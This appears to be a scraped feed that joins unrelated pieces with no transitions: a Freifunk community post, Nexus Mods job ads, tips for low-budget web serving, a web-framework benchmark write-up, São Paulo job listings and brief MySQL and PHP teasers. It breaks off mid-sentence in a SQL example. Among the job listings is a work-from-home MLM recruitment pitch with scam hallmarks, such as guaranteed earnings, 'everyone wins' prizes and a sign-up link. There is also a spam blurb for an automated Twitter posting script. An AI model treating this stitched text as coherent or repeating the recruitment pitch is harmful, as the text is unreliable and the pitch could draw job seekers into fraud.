During recent months I have seen more activity in the Freifunk community again. With the new OpenWRT firmware, Freifunk will have many features we have wanted for years. I am always talking about the fantastic things we can do in local networks - new usage cases and sharing of content in your local environment, community radio in schools, universities or simply your backyard. Local networks differ from the Internet as cinema differs from TV. Felix Fietkau and John presented a development version of OpenWRT to a group in Berlin recently. The new OpenWRT will offer plugins that let us store content directly on the nodes. With router devices offering USB connections, now everyone can have a small web server at home. We can have a local Web 2.0. With devices connected to sensors like thermometers, we can have live feeds from all over the city, the country and the world. I do not want this local Web 2.0 named after a company, a device or anything else. We call it FREIFUNK: a global local = glocal network open to everyone - to the public and to companies.

Companies are always welcome to join development and focus on their business models. However, Open Source, Open Infrastructure and Free Software Projects like Freifunk and LXDE or Open Content projects like Wikipedia have a roadmap that is following long term goals instead of short term profitability. And people are engaging here not just for monetary reasons, they have much broader motivations and they are inspired by the freedom the communities offer. This is why communities are more powerful. Companies simply cannot compete with this in terms of human resources and motivation. In order to grow and sustain free and open projects and the communities though we need to work together in our different fields and we need companies that engage and support the communities.

          We're Hiring: UI Designer/Front End Developer Position        
We're looking for a UI designer/front end developer to join our team at our office in Exeter, UK. The ideal candidate will be multi-skilled, with experience working with HTML/CSS/JS for both websites and desktop applications.

Your primary short term role will be to help design and shape our new desktop application "Vortex" which is replacing the Nexus Mod Manager. This application uses Electron, so the front end is rendered in HTML/CSS/JS.

In the long term, you'll be the major creative driving force behind the UX and UI of both Vortex and the Nexus Mods website, shaping how both the site and application look for millions of users.

[b][size=4]The Role[/size][/b]

You'll be joining our established development teams for both the Nexus Mods website and Vortex.

[b]Nexus websites[/b] - which currently consists of 5 programmers whose primary responsibility is the Nexus Mods website and everything around it. The stack consists of a mixture of technologies - Linux, Apache, NginX, PHP, MySQL, APC, Redis, Ruby, Rails, Bash, Git, Puppet, Vagrant, Javascript, Jquery, CSS, HTML and everything in between. Your role will be to design the UX/UI for current and new features on our website and create imagery for use throughout the site.

[b]Vortex[/b] - which currently consists of 3 programmers who are working on producing an open source desktop application to replace Nexus Mod Manager. The stack for Vortex is currently: Javascript, Typescript, C#, C++, HTML, Node, Electron, React, Redux and Bootstrap. Your role will be to design the UX/UI and layouts for this application and work with the other developers closely on new features.

We work as closely as possible to an agile project management scheme and every team member's input is highly valued - we're looking for people who can constructively discuss and present new ideas in our meetings.

Ultimately, we're looking for people who are keen to learn and flexible in their approach with a strong background in website and/or UI design.

[b][size=4]Your Background[/size][/b]

[*][size=2]You'll need production experience with HTML/CSS/JS and be comfortable with all related technologies such as the related frameworks for each.[/size]
[*][size=2]Experience of using these technologies to deliver a desktop product would be an advantage, but not essential - a portfolio of web only design/UI would be acceptable.[/size]
[*][size=2]Knowledge of gaming and modding would be very beneficial.[/size]

[*][size=2]Working as part of the Vortex team and taking the lead role in the UI and UX.[/size]
[*][size=2]Working with our web team to design new features and functionality for the Nexus Mods website.[/size]
[*][size=2]Occasionally helping out the community team with imagery for site content.[/size]
[*][size=2]Participating in team meetings, keeping track of your workflow using project management tools.[/size]
[*][size=2]Working with everyone at Nexus Mods to shape the future of our platform.[/size]

[size=4][b]Requirements and Skills[/b][/size]

[*][size=2]Javascript & Javascript Frameworks[/size]
[*][size=2]Strong graphic skills (Photoshop, etc.)[/size]
[*][size=2]Strong communication skills both verbally and written (English)[/size]
[*][size=2]Right to work in the UK[/size]
[size=4][b]Bonus Skills[/b][/size]

[*][size=2]Ruby / Rails / PHP[/size]
[*][size=2]Experience with code testing[/size]
[*][size=2]An understanding of games modding and knowledge of Nexus Mods[/size]
[*][size=2]A sense of humour[/size]
[*][size=2]A love of computer games[/size]

[size=4][b]Other Information[/b][/size]

[*][size=2]We will offer a competitive market-rate salary dependent on your level.[/size]
[*][size=2]We will provide high spec hardware for you to work from in the office.[/size]
[*][size=2]For the right candidates, we may be able to assist with relocation expenses and logistics.[/size]
[*][size=2]Fridays are Chocolate Fridays in the office. Get hyped.[/size]
[*][size=2]You'll want to hone your skills in "Golf with Your Friends" before joining us.[/size]
[b][size=4]To Apply[/size][/b]

In order to apply, please send an email to jobs@nexusmods.com with your CV and why you'd be suitable for this role.
          We're Hiring: Web Developer Positions        
[color=orange][b]We're happy to report that both positions listed in this article have now been filled. As such, please don't send us your CV unless you are interested in us keeping it on record for when we are next looking to hire.[/b][/color]

We’re looking for two mid-level to senior web developers to join our team at our [url=http://www.nexusmods.com/games/news/13212/]new office in Exeter[/url], UK. The ideal candidate will be multi-skilled with experience working on high traffic websites.

[b][size=4]The Role[/size][/b]

You’d be joining our established web team which currently consists of 3 programmers whose primary responsibility is the Nexus Mods website and everything around it. Our stack consists of a mixture of technologies - Linux, Apache, NginX, PHP, MySQL, APC, Redis, Ruby, Rails, Bash, Git, Puppet, Vagrant, Javascript, Jquery, CSS, HTML and everything in between.

We’re currently hard at work on the next iteration of the Nexus Mods website and we have a long list of features that we’d like you to help us realise. We work as closely as possible to an agile project management scheme and every team member’s input is highly valued - we’re looking for people who can constructively discuss ideas in our programming meetings.

You’ll need production experience with PHP/MySQL and be comfortable with all related technologies.

Ultimately, we’re looking for people who are keen to learn and flexible in their approach with a strong web background.


[*][size=2]Working as part of the web team to maintain the Nexus Mods website, fixing bugs and adding new features.[/size]
[*][size=2]Participating in team meetings, keeping track of your workflow using project management tools.[/size]
[*][size=2]Working with everyone at Nexus Mods to shape the future of our platform.[/size]

[size=4][b]Requirements and Skills[/b][/size]

[*][size=2]Javascript & Javascript Frameworks[/size]
[*][size=2]CSS & HTML5[/size]
[*][size=2]Strong communication skills both verbally and written (English).[/size]
[*][size=2]Right to work in the UK[/size]

[size=4][b]Bonus Skills[/b][/size]

[*][size=2]Comfortable using Linux[/size]
[*][size=2]Sysadmin / Devops experience with LAMP[/size]
[*][size=2]Ruby / Rails[/size]
[*][size=2]Experience with code testing[/size]
[*][size=2]An understanding of games modding and knowledge of Nexus Mods[/size]
[*][size=2]A sense of humour[/size]
[*][size=2]A love of computer games[/size]

[size=4][b]Other Information[/b][/size]

[*][size=2]We will offer a competitive market rate salary dependent on your level.[/size]
[*][size=2]We will provide high spec hardware for you to work from in the office.[/size]
[*][size=2]For the right candidates we may be able to assist with relocation expenses and logistics. [/size]

[b][size=4]To Apply[/size][/b]

In order to apply, please send an email to jobs@nexusmods.com with your CV and why you’d be suitable for this role.
          Slackware switches to MariaDB        
The Slackware developers are dropping MySQL in favor of MariaDB.
          Web serving on the cheap        
Have you ever wanted to set up a small web server at home that can handle a small but reasonable amount of traffic? Perhaps you have a pet project or a home business and can't justify the cost of professional hosting. Maybe you have a fetish for low powered servers on small internet connections. Or possibly you just want to see if a Slashdotting of your home DSL line will trigger a call from your ISP. In any case, here are some tips on how to get the most out of a small setup.

Understand your limitations

If you don't have a large budget, then you obviously are going to have two big problems:
  • A lack of CPU power
  • A lack of bandwidth

Any effort to improve the performance of your small web site should be directly aimed at alleviating one of these two problems. I'll discuss each of these two issues below. There are other issues, such as a lack of RAM or disk space or disk performance, but usually your CPU and bandwidth will dominate the situation. I'll also ignore the most obvious solution to these problems, which is simply to buy a better processor and a bigger tube.


Bandwidth

More often than not, bandwidth will be your biggest hurdle, especially if you're running your server on your home internet connection; most home connections have terrible upstream speeds, which really hurts when you're a content producer rather than a consumer. In addition, some connections, like DSL, have high latencies.

To mitigate your lack of speed, you're simply going to need to push fewer bytes down the pipe. Look at your web pages and appreciate all of those pretty pictures while you can, because they're the first thing to go. A typical image can be anywhere from 10 to 200 kilobytes, which is simply too large for a small connection, especially if you have 20 of them on the front page. If you can stand it, remove every single GIF, JPEG, and PNG from your site. You may need to redesign your site around the new image-less paradigm, but you won't regret it in a few weeks when you get your bandwidth bill.

Next, move to a CSS-based design instead of a pure HTML one. You should be able to slim down your HTML this way, which will make it that much faster for a user to download. For an added bonus, you should put all of the CSS commands into a separate file. This will slow things down a tiny bit for the user's first visit to the site, but it also means that the same CSS file will be cached on every subsequent page view.
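Moving the styles out is a one-line change in each page's head (the file name here is hypothetical):

```html
<!-- One small, cacheable stylesheet shared by every page -->
<link rel="stylesheet" type="text/css" href="/style.css">
```

After the first visit, the browser fetches only the HTML; the stylesheet comes from its cache.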

Finally, you should go for the biggest savings of all: compressed web pages. The idea is simple: the web server compresses text files before sending them to a user, and the user's web browser automatically decompresses them before rendering them. Every modern web browser supports compressed web pages, and you can see immense space savings from using them. Page compression can be tricky to get right, especially if you're short on CPU power, because it obviously takes some effort by the web server to compress things. There are a few ways around this, one of which is to pre-render compressed versions of frequently accessed pages and then dish those out to users. Experiment with compression to see how much it affects your server's CPU.
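The pre-rendering trick can be sketched in a few lines of PHP (the function name and file names are hypothetical):

```php
<?php
// Pre-compress a rendered page so the web server can hand out the
// ready-made .gz copy instead of compressing on every request.
function precompress(string $src, string $dst): void
{
    $html = file_get_contents($src);
    // Compression level 6 is a reasonable CPU/size trade-off here
    file_put_contents($dst, gzencode($html, 6));
}
```

A cron job can regenerate the `.gz` files whenever the pages change, so the per-request CPU cost drops to almost nothing.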


CPU

If you're on a budget, then you most likely have an old computer with an outdated processor. This isn't necessarily a problem -- even very old computers can saturate a small internet connection -- but you're going to need to code your site correctly if you want to prevent the CPU from becoming your big bottleneck.

The very first thing to go is the database. Sure, a database like MySQL is nice to have and does provide some convenience, but it can totally kill your web server's performance. Obviously, not everyone can drop the database, but many people can; it's usually a waste to store every page of a small web site in a full-fledged database system. Many small web sites could eliminate MySQL completely if they just stored data directly in files instead. For those that absolutely must have a database, at least remove any direct database query from your front page. Sometimes you can even keep a copy of a MySQL query's result in a file and have a program update that file every so often.

Another way to avoid database calls or any other expensive operation is to pre-render entire pages. If you know that your home page is only updated a few times a day, then why dynamically generate it every time someone views it? Just take the rendered page's HTML and save it in a file; the next time a user requests that page, throw the rendered copy at them. You need to be careful not to give users stale pages, but that usually isn't hard to manage on a small site. This concept ties in well with the previously mentioned tactic of saving pre-compressed copies of pages.
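A minimal sketch of such a page cache (the function name, paths, and TTL are hypothetical):

```php
<?php
// Serve a saved copy of a page if it is recent enough; otherwise
// run the expensive render and save the result for the next visitor.
function cached_page(string $cacheFile, int $ttl, callable $render): string
{
    if (is_file($cacheFile) && time() - filemtime($cacheFile) < $ttl) {
        return file_get_contents($cacheFile);  // recent enough: reuse it
    }
    $html = $render();                         // expensive part (DB queries etc.)
    file_put_contents($cacheFile, $html);      // refresh the cached copy
    return $html;
}
```

The TTL guard is a blunt but simple way to avoid serving stale pages; on a small site you can also just delete the cache file whenever the content changes.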

Finally, try to avoid web scripting in general. It is usually hard to avoid, given how much power it provides, but a poorly coded PHP or Perl page can chew through your CPU and RAM; it is best to use it only when it is truly needed. If you manage to free yourself of scripting on all but a few pages, you can even take advantage of a new class of lighter and faster web servers like lighttpd or tux; you'll still need to run a heavier web server process for those few scripted pages, but most of your traffic will hopefully run through the fast and light web server process.
          More Traffic More Sales Use New Auto Twitter Poster        

TwitterXtreme is a hybrid PHP/MySQL script that runs on your own servers and engages in more than modestly aggressive marketing tactics to sell your products and services online. If you're looking for a fully automated Twitter poster that can fully create u



PRODUCTION ASSISTANT (opportunity for people with disabilities) - 1 opening

Requirements: over 18 years old, completed high school. No previous experience necessary.

Activity: routine work in the food production area.

Work days: Monday to Friday.

Working hours: 07:00 to 16:50

Salary and benefits: R$ 600.00 + transport vouchers + on-site meals + health insurance

Location: Vila Olímpia (South Zone of São Paulo)

Vanessa Orfão
Human Resources
Psychologist / HR Analyst
Tel: (11) 2198-1073 / Fax: (11) 3845-1981

Av. Dr. Cardoso de Melo, 671
04548-003 - São Paulo - SP


Since you intend to work from home, I present you with a great opportunity: a large company in the MLM business is hiring direct-mail producers and telemarketing attendants of both sexes, over 18 years old. Simple manual work producing printed direct mail or answering telephones in your home. We ship all the work to your door. The company offers training and an incentive prize (a notebook and a multifunction printer, with no raffles) for meeting the production quota (everyone wins). Initial earnings of R$ 700.00, also per production, plus an expense allowance. Great work for students, retirees, housewives, people who cannot work outside the home, or people who want to increase their income. Opportunity valid throughout Brazil. Those interested should register at www.trabalheemcasaoverdadeiro.com.br/422925, selecting the option to receive the proposal by e-mail, and you will receive the proposal in your e-mail. Contact e-mail: ab.marketingstc@gmail.com. Note: the company is registered with the commercial registry under CNPJ 05.147.869/0001-87. For any questions, check our registration on the Federal Revenue website (http://www.receita.fazenda.gov.br/). Regards, STC marketing team

Job openings for posting follow. Workplace: São Paulo.

Number of openings: 2
Education: completed or ongoing degree (Technology area)
Two years' experience implementing and supporting commercial automation systems for restaurants/retail and TEF. Windows network configuration; Windows operating systems (98, 2000 Professional, XP Professional, Vista Business); Office suite; report preparation and computer maintenance.

Workplace: head office - working internally and externally

Working hours: schedule availability required

Other requirements: must own a car

Number of openings: 1
Education: completed degree in a Technology area
Experience supporting users on the Windows operating system and Office applications. Experience installing and configuring software, hardware, systems, antivirus, firewalls, printers, scanners and networks.

Workplace: Central Kitchen - Itapevi

Working hours: schedule availability required

Other requirements:

Number of openings: 2
Education: completed degree in Business Administration or related areas
Experience in planning, functional specifications, prototypes, validation with users, integrated testing, acceptance testing with users, data modeling, and knowledge and application of techniques based on the PMI (Project Management Institute).

Workplace: head office - Morumbi

Working hours: schedule availability required

Other requirements: knowledge of PMI

Number of openings: 1
Education: completed degree in a Technology area
Experience administering Linux networks, Tomcat, virtualization, data security, backup, information security, telecommunications, Windows, Office, and installing and configuring software, hardware, systems, printers, scanners and networks. Certification and specialization in the area desirable.

Workplace: head office - Morumbi

Working hours: schedule availability required

Other requirements: fluent English

Number of openings: 1
Education: completed degree in Business Administration, Communications or Events
Experience developing a sales channel: administration, promotion and planning of the sales channel. Sustaining results.

Workplace: external

Working hours: schedule availability required

Other requirements: must own a car

Number of openings: 1
Education: completed degree in an exact sciences field
Experience leading a call center: operational performance, feedback, monitoring, developing projects to increase productivity, and motivational campaigns. Budget control and analysis; tracking economic and operational indicators. Budget preparation, review of financial processes, and projections. Maintaining the management information system and conducting innovation studies in planning and control, identifying and proposing methodologies and practices that best meet the company's needs.

Manager: Marco Botelho

Workplace: head office - Morumbi

Working hours: schedule availability required

Número de Vagas: 1
Formação: Superior completo na área Administrativa ou Direito
Experiência na área de call center, irá administrar as anomalias frente ao levantamento dos clientes, administrar reclamações internas ? SAL: Serviço de Atendimento ao Lojista.

Acompanhar relatório junto a Analista de Planejamento, verificar anomalias, disceminar os indicadores de performance e tomar ações interventivas.

Local de Trabalho: Escritório Central - Morumbi

Horário de trabalho: disponibilidade de horário

Número de Vagas: 1
Formação: Superior completo preferencialmente na área de Administração ou Engenharia de Alimentos
Experiência na área fast food, análise de planilhas de custo e relatórios gerenciais para tomada de decisão e realização de ações.

Capacidade de planejamento e visão estratégica irá acompanhar o desempenho dos agentes comerciais das lojas (Gerente, Supervisor de salão, Secretária Financeira, Garçom, Atendente, Caixa, Recepcionista, etc) para direcionamento dos problemas e intervenções corretivas e preventivas.

Local de Trabalho: Escritório Central - Morumbi

Horário de trabalho: disponibilidade de horário

Outros Requisitos: Ter carro próprio

Número de Vagas: 1
Education: High school diploma
Experience with administrative routines; will work in inventory, as a valet driver, and in internal and external support.

Workplace: Head Office - Morumbi

Working hours: flexible schedule required

Other requirements: Must hold a driver's license

Number of openings: 1
Education: High school diploma (complete or in progress)
Experience in customer service and cleaning; will handle company requests across several areas: general cleaning and, occasionally, pantry duty.

Workplace: Head Office - Morumbi

Working hours: flexible schedule required

Number of openings: 1
Education: High school diploma (complete or in progress)
Experience in customer service; will handle company requests, serve coffee and support meetings.

Workplace: Head Office - Morumbi

Working hours: flexible schedule required

Sheila Cristina Vilela
Human Resources Consultant
Grupo Habib's
Tel.: 5904-8450
Nextel: 55*54*41058


I would like to announce an opening for a legal intern, working from 12:00 to 16:00 in central São Paulo; an OAB student-intern card is required.

Salary: R$ 700.00 + transport vouchers

Send your CV to:


Sueli Fatima da Rosa - administration
Godoy & Teixeira Advogados Associados
Rua Conselheiro Crispiniano, 29 - suites 103/104/115
São Paulo - Capital - CEP: 01037-001
tel/fax: 55 11 3159-8900

The largest Internet service provider in Latin America is looking for talented professionals whose career goal is to work at a creative, dynamic company with a young, innovative spirit, matching the profile below:

Java Systems Analyst (Mid-level and Senior).

4 openings.

Essential requirements:
Experience in systems analysis, software architecture and object-oriented analysis
Mastery of the Java programming language (J2EE and J2SE)
Knowledge of UML and its applications, able to turn requirements into UML documentation
Mastery of the MVC architecture and the ability to develop systems that follow it.
Ability to develop complex J2EE applications using EJBs, JMS, JMX and JDBC
Familiarity with the Struts framework.

Rounding out the desired profile:
Bachelor's degree
SUN Certified Java Programmer (SCJP)
Design Patterns and XML
Intermediate English
Knowledge of PMI concepts

CLT (permanent) employment contract.
Workplace: South Zone.

Interested candidates should send a CV in .doc format under job code ANSIST_CLT.


Data Administrator:

1 opening.

Essential requirements:

Completed degree in an IT-related field;

Experience with Oracle databases;

Experience with PL/SQL;

Knowledge of data modeling theory and tools;

Experience with query optimization;

Technical English.

MySQL and SQL Server desirable.

Workplace: South Zone.

Contract: CLT.

Interested candidates should send a CV in .doc format under job code AD_DADOS_CLT.


Gisele Nunes Domingues

HR Analyst
Triad Systems
São Paulo (11) 3054-6628
gisele.nunes@triadsystems.com.br

Schwartz&Consultores Associados is hiring for a large client



(send your CV to schwartzdeise@uol.com.br)


• Responsible for generating demand for the products/services among corporate-market companies;

• General understanding of market solutions such as Application Servers, Databases, Development Tools, JAVA, Workflow, Document Management (GED), Content Management, Portals, etc.;

• Able to discuss the benefits of the proposed solutions at a high level;

• Diagnose needs and present solutions;

• Establish high-level relationships with clients;

• Identify new business opportunities in the assigned accounts;

• Manage the relationship with business partners.


• Age: over 25;

• Gender: no preference

• Education: degree in Business Administration, Marketing, Information Technology, Engineering or related fields;

• Experience: at least five years selling software, hardware and professional-services technologies to the corporate market;

• Personal profile: entrepreneurial, ambitious, proactive, creative in presenting solutions, communicative. Initiative, problem-solving skills, and the ability to work under pressure;

• Able to set the best strategy for reaching their goals;

• An excellent level of rapport with clients and coworkers;

• Languages: intermediate English.


• The company works in outsourcing, specializing in IT services and solutions for mission-critical environments;

• Sector: systems integrator and service provider;

• Job level: Business Executive;

• Salary range: negotiable (the products and services we sell are positioned in the market as adding high value to our prospects' and clients' operations, so we must weigh each candidate's potential against the projects they will be expected to handle and develop);

• Workplace: São Paulo - SP;

• Final note: we need 1 (one) professional with immediate availability.
          The great web technology shootout - Round 1: A quick glance at the landscape        

A lot of the information below is out of date. Please see the new framework shootout page for the latest benchmarks.

Recently I went on a benchmarking spree and decided to throw ApacheBench at a bunch of the different web development technology platforms I interact with on a day-to-day basis. The results were interesting enough to me that I decided I'd take a post to share them here.

Disclaimer: The following test results should be taken with a *massive* grain of salt. If you know anything about benchmarking, you will know that the slightest adjustments have the potential to change things drastically. While I have tried to perform each test as fairly and accurately as possible, it would be foolish to consider these results as scientific in any way. It should also be noted that my goal here was not to see how fast each technology performs at its most optimized configuration, but rather what a minimal out-of-the-box experience looks like.

Test platform info:

  • The hardware was an Intel Core2Quad Q9300, 2.5GHz, 6MB cache, 1333MHz FSB, 2GB DDR RAM.
  • The OS was CentOS v5.3 32-bit with a standard Apache Webserver setup.
  • ApacheBench was used with only the -n and -c flags (1000 requests for the PHP frameworks, 5000 requests for everything else).
  • Each ApacheBench test was run 5-10 times, with the "optimum average" chosen as the numbers represented here.
  • The PHP tests were done using the standard Apache PHP module.
  • The mod_wsgi tests were done in daemon mode set to 2 processes/15 threads.
  • The SQL tests were done with mysqli ($mysql->query()) on PHP, and SQLAlchemy (conn.execute()) on Python fetching and printing 5 rows of data from a sample database.
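Concretely, each run looked something like the following (the URL and the exact request/concurrency counts here are illustrative, not taken from the post):

```shell
# 5000 requests, 10 concurrent, against the static test document.
ab -n 5000 -c 10 http://localhost/test.html
```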

Apache v2.2.3

We will start with the raw Apache benchmark.

For this test, Apache loaded a simple HTML file with random text:

Document Length:        6537 bytes
Requests per second:    8356.23 [#/sec] (mean)

As expected, Apache is lightning fast.

Ok, so now that we've set the high water mark, let's take a look at some popular web technology platforms...

PHP v5.2.8

For this test, I created a PHP file that simply printed the $_SERVER array and some random text:

Document Length:        6135 bytes
Requests per second:    2812.22 [#/sec] (mean)

Next, I decided to add some mysqli() code to connect to a database and print out a few rows of data:

Document Length:        283 bytes
Requests per second:    2135.46 [#/sec] (mean)

Not at all bad, but who really wants to build a webapp using plain old PHP anymore?

Next I decided to test the two PHP frameworks that I am most familiar with.

CakePHP v1.2.5

For this test, I did a basic CakePHP install, and added a route that printed "hello world" from a template:

Document Length:        944 bytes
Requests per second:    42.00 [#/sec] (mean)

As you can see, frameworks can be a blessing and a curse. On a side note, CakePHP was the only test that gave me failed requests.

Kohana v2.3.4

For this test, I did a basic install and loaded Kohana's default welcome/index setup (which seemed lightweight enough to me to qualify as the test focal point):

Document Length:        1987 bytes
Requests per second:    100.11 [#/sec] (mean)

Kohana fared much better than CakePHP, but it appears as though PHP's speed breaks down quickly once you start building a framework around it.

Python v2.5.4

Unlike PHP, Python wasn't specifically created for the web. However, several years ago the WSGI spec was introduced, which makes building web applications with Python a breeze. There are many different ways to deploy a WSGI app, but my tests were limited to Python's built-in WSGIServer and Apache's mod_wsgi.
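For reference, a WSGI application is just a callable; here is a minimal sketch (not the actual test.wsgi used in the benchmarks below):

```python
def application(environ, start_response):
    # A WSGI app receives the request environ dict and a start_response
    # callback, and returns an iterable of byte strings.
    body = b"Hello from WSGI!"
    start_response("200 OK", [("Content-Type", "text/plain"),
                              ("Content-Length", str(len(body)))])
    return [body]

# To serve it with the stdlib reference server (the "WSGIServer" of the tests):
#   from wsgiref.simple_server import make_server
#   make_server("", 8000, application).serve_forever()
```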


For this test, I used WSGI.org's test.wsgi:

Document Length:        4123 bytes
Requests per second:    1658.35 [#/sec] (mean)

These results were quite impressive to me, considering that this is pure Python at work.


mod_wsgi is Apache's module to process WSGI scripts. This test used the exact same script as the previous WSGIServer example:

Document Length:        9552 bytes
Requests per second:    3994.30 [#/sec] (mean)

Don't look now, but those results are better than the vanilla PHP test!

Next, I added SQLAlchemy imports to the test file and did a conn.execute(), in an attempt to try to mimic the PHP mysqli() test:

Document Length:        10212 bytes
Requests per second:    3379.87 [#/sec] (mean)

I expected to lose quite a bit of speed with the introduction of an ORM, but it looks like SQLAlchemy is quite fast. These results were still over 1,000 reqs/s faster than the PHP example.


There's been a lot of buzz lately about the new TornadoServer, so I thought I'd throw it in the mix. This test uses their basic "hello world" example:

Document Length:        12 bytes
Requests per second:    3330.00 [#/sec] (mean)

Nothing shocking here at first glance, but Tornado is built to handle extreme loads. So, I increased the concurrency to 1,000 and threw 10,000 requests at it:

Document Length:        12 bytes
Concurrency Level:      1000
Complete requests:      10000
Requests per second:    3288.15 [#/sec] (mean)

Almost exactly the same results! On a side note, none of the other test subjects were able to handle a concurrency of 1,000.

TurboGears v2.0.3 (mod_wsgi)

TurboGears has quickly become my framework of choice, so naturally it was the first Python framework I tested.

For this test I setup a default quickstart project, and then added a hello() controller method which simply returned a "hello world" string:

Document Length:        11 bytes
Requests per second:    470.18 [#/sec] (mean)

Next, I added a simple Genshi template with 1 level of inheritance:

Document Length:        1351 bytes
Requests per second:    143.26 [#/sec] (mean)

While those results are not terrible, they should encourage you to check out the other templating options.

Next, I performed the same test with Mako:

Document Length:        1534 bytes
Requests per second:    394.41 [#/sec] (mean)

As you can see, Mako is significantly faster than Genshi.

TurboGears also supports Jinja2, so I thought I'd also see how it held up:

Document Length:        1020 bytes
Requests per second:    401.04 [#/sec] (mean)

I was not expecting Jinja2 to be faster than Mako, so I am not entirely sure about these results. However, the difference is only slight, and might have something to do with the fact that the dotted template names finder is disabled for Jinja templates.

Pylons v0.9.7 (mod_wsgi)

Mark Ramm (the current development lead of TurboGears) has been quoted as saying "TurboGears is to Pylons as Ubuntu is to Debian." With that in mind, I naturally wanted to see how much speed I was losing with TurboGears' "additions".

For this test I tried to mimic the first TurboGears test (basic layout, returning a string):

Document Length:        11 bytes
Requests per second:    1961.00 [#/sec] (mean)

While I was expecting a gain from TurboGears' omissions, I wasn't quite expecting over a fourfold increase. I can only assume that the bare Pylons setup is pretty minimal, while TurboGears bootstraps a lot of stuff for you by default.

Duplicating the Mako test in Pylons was also quite fast:

Document Length:        9743 bytes
Requests per second:    1183.39 [#/sec] (mean)

Bottle v0.5.7 (mod_wsgi)

Bottle caught my attention recently as a minimalistic Python web framework, so I thought I'd put it through the grind as well.

For this test, I used their simple "hello world" example:

Document Length:        12 bytes
Requests per second:    3912.43 [#/sec] (mean)

As you can see, Bottle is very close to bare WSGI as far as speed goes. On a side note, adding a sample template using Bottle's default templating package didn't seem to change these numbers at all.

Next I tested Bottle with its templating system switched to Mako:

Document Length:        41 bytes
Requests per second:    3134.61 [#/sec] (mean)

Then I added SQLAlchemy and performed a query:

Document Length:        9374 bytes
Requests per second:    2503.27 [#/sec] (mean)

What was exciting to me about this test was that I found myself looking at a minimal Python framework equipped with a full templating system and ORM which all performed faster than the PHP+mysqli() test.

Django v1.1 (mod_wsgi)

I don't use Django, but I thought it would be worth including in this report. This is a basic Django setup printing out a simple hello world template:

Document Length:        1471 bytes
Requests per second:    564.41 [#/sec] (mean)

As expected, a minimal Django setup is quite fast. (Note: This test included a SQLite database query.)

Ruby On Rails v2.2.3 (mod_passenger)

I also don't use Rails, but I figured this report would be incomplete without Rails on the list. So, I took MediaTemple's Rails test app and loaded up a test page:

Document Length:        1291 bytes
Requests per second:    433.57 [#/sec] (mean)

Note that the test app used here is doing a little bit more than just returning "Hello World".

My Conclusions

As I said in the disclaimer, to arrive at any sort of decisive conclusions based on these numbers alone would be foolish. However, here is what all of this left me thinking:

  • All of these technologies performed adequately for use with most projects.
  • CakePHP was the only test that produced less than 100 requests per second. However, there are many articles available on optimizing CakePHP.
  • These results made me wish I had moved away from PHP much earlier in my web development career. There are simply better options these days when it comes to choosing a web development language (imho). If you must use PHP for a large project, I strongly suggest you look into an accelerator.
  • The Bottle+Mako+SQLAlchemy results struck me as an extremely minimal drop-in replacement for simple PHP sites.
  • mod_wsgi is a huge winner in deploying Python webapps. Way to go Graham!
  • Do your own benchmarking, because your mileage *will* vary!

Like what you've seen here? Check out Round 2.

          Guide: Android on a Mac with RemixOS        
Remix OS, an operating system based on Android that can be installed natively on the desktop (both Mac and Windows), was released a short while ago. Once the file has been downloaded from the official site, all that remains is to extract the archive, inside which we will find the .iso and a tool that makes creating the USB stick easier, but only for Windows users. Users [...]
          PHP5: Configuring “date.timezone” on Linux        
If, when upgrading to PHP5 (see here for how to do it on Debian), you too run into a "Warning" caused by date.timezone, below is how to fix it in a few simple steps. The warning in question is the following: Warning: error_log(): It is not safe to rely on the system's timezone settings. You are *required* to use the date.timezone [...]
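The fix the post refers to typically amounts to setting date.timezone in php.ini; a sketch, where the file path and timezone value are assumptions to adapt to your system:

```ini
; e.g. /etc/php5/apache2/php.ini on Debian (path varies by distro)
date.timezone = "Europe/Rome"
```

After editing, restart the web server (e.g. `service apache2 restart`) for the change to take effect.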
          Comments on "Och så var man tillbaka på kontoret" ("And so you were back at the office") by http://www.hausratversicherung.tech/        
Very good explanation! I followed it step by step on XAMPP 1.7.1 and it ended up working very well. Now I have to work on some code that retrieves the user's password from a MySQL table and emails it to them. Suggestions welcome. Regards, Ronaldo._
          How to Backup a Live MySQL DB Without Locking Tables Using mysqldump        

Backing up MySQL is not very hard — you just run mysqldump and output to a file — but it’s also not really d…
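The technique the post goes on to describe is presumably mysqldump's --single-transaction option; a sketch, with the user, database and output names as placeholder assumptions:

```shell
# Consistent dump of a live InnoDB database without locking tables.
# --single-transaction reads from a single consistent snapshot;
# --quick streams rows instead of buffering whole tables in memory.
mysqldump --single-transaction --quick -u backupuser -p mydb > mydb_backup.sql
```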


          How to Exclude Tables from MySQL Exports Using mysqldump        

While setting up a new testing environment to help development make slightly fewer bugs, I was looking at how to transfer the database…
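mysqldump can exclude tables with --ignore-table, one flag per table and always schema-qualified; a sketch with placeholder names:

```shell
# Dump mydb but skip the bulky cache and session tables.
mysqldump -u backupuser -p mydb \
  --ignore-table=mydb.cache \
  --ignore-table=mydb.sessions > mydb_no_cache.sql
```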


          How to Backup / Export a Single Table from a MySQL Database        

The other day I was testing a feature on my development box when I realized my local data was really out of date, and if I was going to get anywhere with my testing, I needed some recent data from production.
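Exporting a single table is just a matter of naming it after the database on the mysqldump command line; placeholder names again:

```shell
# Dump only the orders table from mydb.
mysqldump -u backupuser -p mydb orders > orders.sql
```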


          How to See Which MySQL Tables are Taking the Most Space        

Database backups are one of those things that just keep getting bigger and bigger until they consume all the matter in the world.
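One way to see which tables take the most space is to query information_schema; a sketch (the schema name is a placeholder):

```sql
-- Tables in mydb ordered by total size (data + indexes), in MB.
SELECT table_name,
       ROUND((data_length + index_length) / 1024 / 1024, 1) AS size_mb
FROM information_schema.tables
WHERE table_schema = 'mydb'
ORDER BY size_mb DESC;
```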


          Mysql - Recursive Sql Query         
Recursive SQL query in MySQL: when each row has only a single father or a single mother (one parent), the problem can be solved with a single query.
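The note gives no code, but the single-parent case can be sketched with a recursive CTE. The example below uses Python's stdlib sqlite3 purely for illustration (MySQL 8.0+ accepts the same WITH RECURSIVE syntax; older MySQL needs self-joins or a stored procedure), and the table and names are hypothetical:

```python
import sqlite3

# Hypothetical table: each row has at most one parent, so the whole
# ancestor chain can be fetched with a single recursive query.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE person (id INTEGER PRIMARY KEY, name TEXT, parent_id INTEGER);
    INSERT INTO person VALUES (1, 'grandparent', NULL),
                              (2, 'parent', 1),
                              (3, 'child', 2);
""")

# Walk up from 'child' to the root in one statement.
rows = conn.execute("""
    WITH RECURSIVE ancestors(id, name, parent_id) AS (
        SELECT id, name, parent_id FROM person WHERE name = 'child'
        UNION ALL
        SELECT p.id, p.name, p.parent_id
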